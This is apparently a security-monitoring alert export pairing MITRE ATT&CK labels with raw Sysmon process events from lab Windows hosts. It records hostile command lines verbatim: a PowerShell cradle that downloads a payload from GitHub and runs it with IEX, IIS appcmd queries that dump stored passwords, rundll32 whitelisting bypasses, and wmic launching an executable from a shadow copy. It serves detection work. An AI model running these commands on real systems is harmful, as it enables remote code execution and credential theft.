SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + 
C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1557668280.712733,2019-05-12T17:38:00.712733+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16395 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:38:00.523 + 365ABB72-21B8-5CD8-0000-0010BADE2600 + 3856 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1553028075.144276,2019-03-20T00:41:15.144276+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966251 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:36:04.206 + 365ABB72-52B4-5C91-0000-0010355B0100 + 1628 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 
365ABB72-528D-5C91-0000-0020E7030000 + 0x3e7 + 0 + System + MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-528D-5C91-0000-001062560000 + 484 + C:\Windows\System32\services.exe + C:\Windows\system32\services.exe + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1602935016.312645,2020-10-17T15:43:36.312645+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe")",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 417079 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 11:43:36.303 + 747F3D96-D8E8-5F8A-0000-00102CEF7200 + 840 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" + C:\Users\IEUser\AppData\Roaming\ + MSEDGEWIN10\IEUser + 747F3D96-CA8D-5F8A-0000-0020D1090A00 + 0xa09d1 + 1 + High + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-D8E5-5F8A-0000-0010E1BC7200 + 2920 + C:\Users\IEUser\AppData\Roaming\WINWORD.exe + C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1565785034.89393,2019-08-14T16:17:14.893930+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab})",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 10674 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-14 12:17:14.447 
+ 747F3D96-FBCA-5D53-0000-0010B8664100 + 2476 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-F419-5D53-0000-002026910200 + 0x29126 + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-F41E-5D53-0000-001067C80300 + 4824 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1602935016.312645,2020-10-17T15:43:36.312645+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 417079 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 11:43:36.303 + 747F3D96-D8E8-5F8A-0000-00102CEF7200 + 840 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" + C:\Users\IEUser\AppData\Roaming\ + MSEDGEWIN10\IEUser + 747F3D96-CA8D-5F8A-0000-0020D1090A00 + 0xa09d1 + 1 + High + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-D8E5-5F8A-0000-0010E1BC7200 + 2920 + C:\Users\IEUser\AppData\Roaming\WINWORD.exe + C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart + 
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1565785034.89393,2019-08-14T16:17:14.893930+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 10674 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-14 12:17:14.447 + 747F3D96-FBCA-5D53-0000-0010B8664100 + 2476 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-F419-5D53-0000-002026910200 + 0x29126 + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-F41E-5D53-0000-001067C80300 + 4824 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920559.233522,2019-05-27T05:29:19.233522+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Filename: redirection.config" /text:userName ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5952 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:19.183 + 365ABB72-3D6F-5CEB-0000-001026B9FF00 + 1036 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line 
Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Filename: redirection.config" /text:userName + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558969974.544664,2019-05-27T19:12:54.544664+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6188 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:54.428 + 365ABB72-FE76-5CEB-0000-0010546E0C00 + 2356 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-FD85-5CEB-0000-00104C0E0B00 + 1944 + C:\Windows\System32\notepad.exe + 
"C:\Windows\System32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1602935016.312645,2020-10-17T15:43:36.312645+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 417079 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 11:43:36.303 + 747F3D96-D8E8-5F8A-0000-00102CEF7200 + 840 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" + C:\Users\IEUser\AppData\Roaming\ + MSEDGEWIN10\IEUser + 747F3D96-CA8D-5F8A-0000-0020D1090A00 + 0xa09d1 + 1 + High + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-D8E5-5F8A-0000-0010E1BC7200 + 2920 + C:\Users\IEUser\AppData\Roaming\WINWORD.exe + C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1565785034.89393,2019-08-14T16:17:14.893930+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 10674 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-14 12:17:14.447 + 747F3D96-FBCA-5D53-0000-0010B8664100 + 2476 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + 
"C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-F419-5D53-0000-002026910200 + 0x29126 + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-F41E-5D53-0000-001067C80300 + 4824 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557680510.781015,2019-05-12T21:01:50.781015+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16496 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 17:01:31.380 + 365ABB72-516B-5CD8-0000-001087E41600 + 3788 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-4FB5-5CD8-0000-0020F2350100 + 0x135f2 + 1 + Medium + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-502E-5CD8-0000-00102A330700 + 3192 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1558969974.544664,2019-05-27T19:12:54.544664+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1," + 
+ + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6188 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:54.428 + 365ABB72-FE76-5CEB-0000-0010546E0C00 + 2356 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-FD85-5CEB-0000-00104C0E0B00 + 1944 + C:\Windows\System32\notepad.exe + "C:\Windows\System32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1223] Compiled HTML File,1564126754.409237,2019-07-26T11:39:14.409237+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\hh.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4348 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-26 07:39:14.345 + 747F3D96-AE22-5D3A-0000-001096B24E00 + 1504 + C:\Windows\hh.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft® HTML Help Executable + HTML Help + Microsoft Corporation + "C:\Windows\hh.exe" C:\Users\IEUser\Desktop\Fax Record N104F.chm + C:\Users\IEUser\Desktop\ + MSEDGEWIN10\IEUser + 747F3D96-ABD5-5D3A-0000-0020EB990F00 + 0xf99eb + 1 + Medium + SHA1=4B1E2F8EFBECB677080DBB26876311D9E06C5020,MD5=1CECEE8D02A8E9B19D3A1A65C7A2B249,SHA256=8AB2F9A4CA87575F03F554AEED6C5E0D7692FA9B5D420008A1521F7F7BD2D0A5,IMPHASH=D3D9C3E81A404E7F5C5302429636F04C + 747F3D96-ABD7-5D3A-0000-001012661000 + 4940 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational 
+[T1117] Bypassing Application Whitelisting,1584766825.20521,2020-03-21T09:00:25.205210+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243534 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:24.993 + 747F3D96-9F68-5E75-0000-0010B9662000 + 7420 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.20521,2020-03-21T09:00:25.205210+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243534 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:24.993 + 747F3D96-9F68-5E75-0000-0010B9662000 + 7420 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT 
AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766825.20521,2020-03-21T09:00:25.205210+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243534 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:24.993 + 747F3D96-9F68-5E75-0000-0010B9662000 + 7420 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920559.143393,2019-05-27T05:29:19.143393+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 
0x8000000000000000 + + + 5949 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:19.103 + 365ABB72-3D6F-5CEB-0000-001066B5FF00 + 2796 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1059 ] wscript or cscript runing script,1564434679.865791,2019-07-30T01:11:19.865791+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line ("C:\Windows\System32\wscript.exe" /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt) and Parent Image :C:\Windows\SysWOW64\rundll32.exe , Parent CommandLine ("C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl",) in directory : ( C:\Users\IEUser\AppData\Local\Temp\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4865 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:11:19.010 + 747F3D96-60F7-5D3F-0000-00106F2F5600 + 6160 + C:\Windows\SysWOW64\wscript.exe + 5.812.10240.16384 + Microsoft ® Windows Based Script Host + Microsoft ® Windows Script Host + Microsoft Corporation + "C:\Windows\System32\wscript.exe" /e:JScript.Encode /nologo 
C:\Users\IEUser\AppData\Local\Temp\info.txt + C:\Users\IEUser\AppData\Local\Temp\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-0020B5314100 + 0x4131b5 + 1 + Medium + SHA1=5D7F2AFD2FF69D379B69DD94033B51EC537E8E52,MD5=F2748908C6B873CB1970DF4C07223E72,SHA256=0FBB4F848D9FB14D7BF81B0454203810869C527C3435E8747A2213DD86F8129A,IMPHASH=3602F3C025378F418F804C5D183603FE + 747F3D96-60F5-5D3F-0000-0010A8D75500 + 4884 + C:\Windows\SysWOW64\rundll32.exe + "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1074] Data Staged - Process,1564436003.232566,2019-07-30T01:33:23.232566+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4910 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:23.170 + 747F3D96-6623-5D3F-0000-001011F68700 + 5816 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + 
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436003.232566,2019-07-30T01:33:23.232566+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4910 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:23.170 + 747F3D96-6623-5D3F-0000-001011F68700 + 5816 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c powershell -c "(New-Object 